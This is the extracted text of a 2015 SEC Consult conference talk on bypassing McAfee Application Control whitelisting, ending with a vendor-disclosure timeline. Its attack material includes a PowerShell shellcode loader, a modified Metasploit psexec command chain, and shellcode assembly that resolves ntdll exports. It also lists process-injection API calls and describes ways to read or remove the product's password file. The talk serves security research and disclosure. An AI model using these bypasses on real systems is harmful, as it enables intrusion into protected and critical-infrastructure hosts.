Académique Documents
Professionnel Documents
Culture Documents
Agenda
SEC Consult
Application Whitelisting
Overview - McAfee Application Control
Bypassing Application Whitelisting
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
SEC Consult
SEC Consult
Vilnius | LT
Berlin| DE
Moscow | RU
Frankfurt | DE
Vienna (HQ) | AT
Wiener Neustadt | AT
Montreal | CA
Zurich | CH
Founded 2002
Singapore | SG
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
Application Whitelisting
Application Whitelisting
Idea
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
Application Whitelisting
Main field of application
Systems in critical infrastructures (e.g. SCADA
environments)
Important company systems / servers
Workstations with high security requirements (administrative
workstations)
Kiosk systems
....
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
Application Whitelisting
Solutions:
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
Implementation details
Protection of libraries
Protection of scripts
Configuration files of the application / the database file
2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
Windows XP x86
Windows 7 x86
Windows 8.1 x64
Windows 2008R2 x64 (not working)
2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
11
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
12
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
13
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
14
Read protection
Used e.g. to protect the whitelist or the password-hash file
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
15
apache.exe
Apple Software Update\softwareupdate.exe
armsvc.exe
dism.exe
ePolicy Orchestrator\EventParser.exe
ePolicy Orchestrator\Server\bin\tomcat5.exe
ePolicy Orchestrator\Server\bin\tomcat7.exe
FCAgent.exe
FCPatchInstallAgent.exe
firesvc.exe
FlashplayerUpdateService.exe
FramePkg.exe
Frameworkservice.exe
Framew~1.exe
FSAssessment.exe
FSDiscovery.exe
FSScanCtrlSvc.exe
FSScanEngineSvc.exe
2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
HIPSvc.exe
HtmlDlg.exe
iexplore.exe -l mcinsctl.dll
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
16
-n
-t
-t
-t
-t
-t
-t
-t
-t
-t
-t
-t
-t
-t
-t
-t
-t
-t
-t
-t
-t
-t
-t
-t
-t
HP_Quality_Center1
J2RE2
J2RE1
JavaUpdate2
JavaUpdate1
McAfee46
McAfee9
McAfee41
McAfee14
McAfee19
McAfee31
McAfee8
McAfee11
McAfee20
McAfee7
McAfee40
McAfee44
McAfee45
McAfee30
McAfee3
McAfee6
McAfee12
McAfee15
McAfee13
iexplore.exe -l QCClient.UI.Core.dll
ikernel.exe -p svchost.exe
ikernel.exe -p winlogon.exe
Java\Java Update\jucheck.exe
Java\Java Update\jusched.exe
McAfee\Real Time\rtclient.exe
Mcappins.exe
McCHSvc.exe
mcmnhdlr.exe
mcods.exe
McSACore.exe
McScript.exe
McScript_InUse.exe
mcshell.exe
McShield.exe
McSvHost.exe
McTELSvc.exe
McTELUpd.exe
McTray.exe
Mcupdate.exe
2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Mcupdmgr.exe
McVSEscn.exe
Mcvsrte.exe
mcvsshld.exe
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
17
-t
-t
-t
-t
-t
-t
-t
-t
-t
-t
-t
-t
-t
-t
-t
-t
-t
-t
-t
-t
-t
-t
McAfee24
McAfee5
MozillaMaintenanceService1
McAfee2
McAfee21
Nvidiadaemonu1
McAfee38
MCGroupShield1
McAfee34
McAfee29
McAfee17
PRINTER1
McAfee33
METROAPP1
METROAPP2
WindowsSQMconsolidator1
SERVERROLES2
McAfee4
McAfee26
McAfee28
McAfee27
WINDOWS1
mer.exe
Mghtml.exe
Mozilla Maintenance Service\maintenanceservice.exe
Msshield.exe
myAgtSvc.exe
NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
ReportServer.exe
RPCServ.exe
RSSensor.exe
SBadduser.exe
scan32.exe
spoolsv.exe
Supportability\MVT\MvtApp.exe
svchost.exe -l appxdeploymentserver.dll
svchost.exe -l wsservice.dll
system32\Wsqmcons.exe
tiworker.exe
udaterui.exe
VirusScan Enterprise\VsTskMgr.exe
VirusScan
Enterprise\x64\EngineServer.exe
2013 SEC Consult
Unternehmensberatung GmbH
All rights reserved
VirusScan Enterprise\x64\Scan64.exe
webfldrs.msi
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
18
Source: http://www.mcafee.com/mx/resources/solution-briefs/sb-app-control-legacy-windows-xp.pdf
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
19
User space
Console application
sadmin.exe
Inter Process
Communication
(IPC)
IOCTLcodes
Service
Scsrvc.exe
types commands
User
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
20
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
22
PowerShell
Pentesters best friend PowerShell
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
23
PowerShell examples
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
24
PowerShell examples
Which PowerShell script do we start?
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
25
PowerShell examples
$code = @"
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint
dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes,
uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint
dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);
"@
$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace
Win32Functions -passthru
[Byte[]]$sc = 0xfc,0xe8,0x89,*OTHER SHELLCODE*,0x63,0x00
$size = 0x1000
if ($sc.Length -gt 0x1000) {$size = $sc.Length}
$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40)
for ($i=0;$i -le ($sc.Length-1);$i++)
{$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)}
$winFunc::CreateThread(0,0,$x,0,0,0)
2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Script from Social Engineering Toolkit (SET), original author: Matthew Graeber (minor modifications by myself)
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
26
Idea
Devide task of code execution into two steps
Step 1 basic code execution (e.g. scripts)
Step 2 full code execution (e.g. Powershell)
2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
27
Attack vectors
Focus on real world attacks
We want to protect against real world attacks
Therefore we have to test exactly these scenarios!
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
28
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
30
Attack scenario
Send victim a file
Victim opens/starts the file
Victim is infected
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
31
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
32
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
33
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
34
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
35
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
36
SQL injection
OS command injection
Code injection
File upload vulnerability
2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
37
Pentesting tool
Metasploit module: psexec
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
38
Pass-the-Hash attack
Source: https://www.offensive-security.com/metasploit-unleashed/psexec-pass-hash/
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
39
Pass-the-Hash attack
Source: https://www.offensive-security.com/metasploit-unleashed/psexec-pass-hash/
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
40
Pass-the-Hash attack
Source: https://www.offensive-security.com/metasploit-unleashed/psexec-pass-hash/
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
41
Pass-the-Hash attack
Pass-the-hash attack from metasploit does not work if
system is protected by Application Whitelisting
Reason can be found in code
/usr/share/metasploit-framework/
modules/auxiliary/admin/smb/psexec_command.rb
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
42
Pass-the-Hash attack
Example: psexec command is whoami
Resulting command:
cmd.exe /c
echo whoami ^> C:\randomName
> C:\...\temp.bat
&
cmd.exe /c start
cmd.exe /c C:\..\temp.bat
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
43
Pass-the-Hash attack
Simple modification:
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
44
Rundll32.exe
Script intepreters (python, perl, PHP, JSP, ...)
Debuggers
...
2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
46
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
47
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
48
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
49
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
50
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
51
Long LongPtr
Use PtrSafe in front of function definition
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
52
Two possibilities
Without basic code execution E.g. Browser exploit
With basic code execution Exploit a local application to
inject code into the whitelisted application
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
53
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
54
55
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
56
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
57
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
58
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
59
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
61
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
62
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
63
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
64
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
65
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
66
Test 2
VLC .S3M Stack Buffer Overflow (CVE-2011-1574)
2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
67
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
68
Test 2
VLC .S3M Stack Buffer Overflow (CVE-2011-1574)
Result: Works without modification on first attempt
Test 3
69
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
70
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
71
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
72
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
73
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
74
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
75
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
76
XOR EDX,EDX
MOV ESI,DWORD PTR FS:[EDX+30]
// TEB
MOV ESI,DWORD PTR DS:[ESI+C]
// => PEB_LDR_DATA
MOV ESI,DWORD PTR DS:[ESI+C]
// LDR_MODULE InLoadOrder[0]
LODS DWORD PTR DS:[ESI]
// eax := InLoadOrder[1] (ntdll)
MOV ESI,EAX
MOV EDI,DWORD PTR DS:[ESI+18]
// edi = ntdll dllbase
MOV EBX,DWORD PTR DS:[EDI+3C]
// offset(PE header) of ntdll
MOV EBX,DWORD PTR DS:[EDI+EBX+78]
// offset(export table)
MOV ESI,DWORD PTR DS:[EDI+EBX+20]
// offset name table
ADD ESI,EDI
// esi = &(name table) (convert RVA to abs)
MOV ECX,DWORD PTR DS:[EDI+EBX+24]
// offset(ordinals table)
ADD ECX,EDI
// ecx = &(ordinals table) (convert RVA to abs)
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
77
//
//
//
//
(5)
eax
(2)
ecx
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
78
. EB 0D
// jmp down
// jmp startCalc
> E8 EEFFFFFF
CALL CalcShel.00401078
// call up
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
79
Shellcode (4/4)
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
80
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
81
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
82
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
84
Credential Prompt
Consent Prompt
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
85
86
Some others
2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
87
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
89
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
90
91
McAfee22
HtmlDlg.exe
McAfee16
iexplore.exe -l mcinsctl.dll
HP_Quality_Center1 iexplore.exe -l QCClient.UI.Core.dll
J2RE2
ikernel.exe -p svchost.exe
J2RE1
ikernel.exe -p winlogon.exe
JavaUpdate2
Java\Java Update\jucheck.exe
JavaUpdate1
Java\Java Update\jusched.exe
McAfee46
McAfee\Real Time\rtclient.exe
McAfee9
Mcappins.exe
McAfee41
McCHSvc.exe
McAfee14
mcmnhdlr.exe
McAfee19
mcods.exe
McAfee31
McSACore.exe
McAfee8
McScript.exe
McAfee11
McScript_InUse.exe
McAfee20
mcshell.exe
2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
McAfee7
McShield.exe
McAfee40
McSvHost.exe
McAfee44
McTELSvc.exe
McAfee45
McTELUpd.exe
McAfee30
McTray.exe
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
92
McAfee3
Mcupdate.exe
McAfee6
Mcupdmgr.exe
McAfee12
McVSEscn.exe
McAfee15
Mcvsrte.exe
McAfee13
mcvsshld.exe
McAfee24
mer.exe
McAfee5
Mghtml.exe
MozillaMaintenanceService1 Mozilla Maintenance Service\maintenanceservice.exe
McAfee2
Msshield.exe
McAfee21
myAgtSvc.exe
Nvidiadaemonu1
NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
McAfee38
ReportServer.exe
MCGroupShield1
RPCServ.exe
McAfee34
RSSensor.exe
McAfee29
SBadduser.exe
McAfee17
scan32.exe
2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
PRINTER1
spoolsv.exe
McAfee33
Supportability\MVT\MvtApp.exe
METROAPP1
svchost.exe -l appxdeploymentserver.dll
METROAPP2
svchost.exe -l wsservice.dll
WindowsSQMconsolidator1 system32\Wsqmcons.exe
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
93
SERVERROLES2
McAfee4
McAfee26
McAfee28
McAfee27
WINDOWS1
tiworker.exe
udaterui.exe
VirusScan Enterprise\VsTskMgr.exe
VirusScan Enterprise\x64\EngineServer.exe
VirusScan Enterprise\x64\Scan64.exe
webfldrs.msi
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
94
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
95
openProcess()
VirtualAllocEx()
WriteProcessMemory()
CreateRemoteThread()
2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
96
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
97
By exploiting it we can
Read C:\Program Files\McAfee\Solidcore\passwd
Remove C:\Program Files\McAfee\Solidcore\passwd
Change configuration in registry
2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
98
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
10
0xb37031f0
0xb37031f8
0xb37031fc
0xb370320c
0xb3703200
0xb3703204
0xb3703208
0xb3703214
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
10
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
10
Demos
Demos (1/6)
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
10
Demos (2/6)
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
10
Demos (3/6)
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
10
Demos (4/6)
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
10
Demos (5/6)
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
10
Demos (6/6)
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
10
Conclusion
Conclusion
Application Whitelisting can protect against trivial attacks
APT attackers can easily bypass the protections with the
described techniques
In some cases the application even lowers the security of
the operating system
Allocation of a RWE section in all processes
Kernel vulnerabilities which allow privilege escalation
2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
111
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
112
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/201507280_McAfee_Application_Control_Multiple_Vulnerabilities_v10.txt
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
113
Vendor response
RWX memory vulnerability confirmed
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
114
Vendor response
ZIP application from 1999 with buffer overflow confirmed
Source: http://www.cvedetails.com/cve/CVE-2004-1010/
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
115
Vendor response
Other bypasses / vulnerabilities will not be fixed
116
Vendor response
Other bypasses / vulnerabilities will not be fixed
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
117
Timeline
2015-06-03: Contacting vendor through security-alerts@mcafee.com
Sending PGP encrypted whitepaper to vendor.
Informed McAfee about the latest possible release date: 2015-07-24.
2015-06-04: Vendor response - issues will be tracked with case ID SBC1506031
2015-06-08: SEC Consult asked for a release date of a fix.
2015-07-02: SEC Consult asked for a release date of a fix and the current status.
2015-07-13: SEC Consult asked for a release date of a fix and the current status.
2015-07-14: Vendor response - Vendor confirmed vulnerabilities 1) and 2).
Vulnerabilities 3), 4) and 5) are classified as "not vulnerable"
because an attacker requires code execution to exploit them.
Vulnerabilities 1) and 2) are classified as low risk vulnerabilities.
A patch will therefore not be available, a fix is planned for the next
version update which will be released by end of Q3.
2015-07-21: SEC Consult informed McAfee that an advisory will be released on 28.07.2015.
SEC Consult informed McAfee that vulnerabilities 3), 4)
and 5) should be fixed as well because code execution can easily be
achieved on a default installation of McAfee Application Control and
2013 SEC Consult Unternehmensberatung GmbH
therefore it's possible
to exploit all the described vulnerabilities.
All rights reserved
2015-07-28: Public release of the advisory
2015-11-06: Presentation at IT-SeCX; Tests conducted with version 6.1.3.353
Current Version is 6.2.0-446
Status: Nothing fixed
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
118
Contact
Germany
Austria
www.sec-consult.com
AUSTRIA
SEC Consult Unternehmensberatung GmbH
Komarigasse 14/1
2700 Wiener Neustadt
Switzerland
SEC Consult (Schweiz) AG
Turbinenstrasse 28
8005 Zrich
Tel +41 44 271 777 0 | Fax +43 1 890 30 43 15
Email office-zurich@sec-consult.com
CANADA
LITAUEN
Email office-montreal@sec-consult.com
RUSSIA
SINGAPORE
Email office-singapore@sec-consult.com
Email office-bangkok@sec-consult.com
Title: Bypassing McAfees Application Whitelisting for critical infrastructure systems | Responsible: R. Freingruber
Version / Date: V1.0 / 11-2015] | Confidentiality Class: Public
THAILAND
119